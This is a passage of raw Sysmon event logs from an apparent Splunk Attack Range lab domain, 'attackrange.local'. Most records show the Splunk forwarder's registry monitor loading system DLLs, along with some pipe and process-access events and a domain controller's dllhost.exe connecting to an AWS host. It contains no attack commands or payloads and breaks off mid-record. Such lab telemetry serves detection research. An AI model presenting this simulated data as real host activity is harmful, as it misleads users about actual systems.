Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001606362Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.594{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001606361Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.594{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001606360Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:31.593{21761711-7A87-6080-C560-00000000BB01}2428\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x80000000000000001606359Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.593{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001606358Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x80000000000000001606357Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001606356Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001606355Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001606354Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001606353Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001606352Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001606351Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001606350Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001606349Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606348Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001606347Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001606346Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001606345Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001606344Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001606343Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001606342Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001606341Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001606340Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001606339Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001606338Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001606337Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001606336Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001606335Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001606334Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001606333Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001606332Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001606331Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001606330Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001606329Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001606328Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x80000000000000001606327Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001606326Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001606325Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606324Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001606323Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001606322Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001606321Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42trueSplunk, Inc.Valid 10341000x80000000000000001606320Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-83AC-607D-0500-00000000BB01}412528C:\Windows\system32\csrss.exe{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001606319Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001606318Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.564{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001606317Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:31.561{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606316Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:31.561{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606315Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:31.561{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606314Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:31.561{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606313Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:31.561{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606312Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:31.561{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001606311Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.561{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606310Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.561{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1BCDBBC65BD9E590EE22C31DB4EDC5E,SHA256=7B3DF87164D3A2A6A46482B65DE37724F29116F1C0D15E6A9EC4CA97F4E8B9F6falsefalse - insufficient disk space 354300x80000000000000001095244Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:26.756{761B69BB-660F-6080-305D-00000000BA01}384C:\Windows\System32\dllhost.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-982.attackrange.local1156-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x80000000000000001095243Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 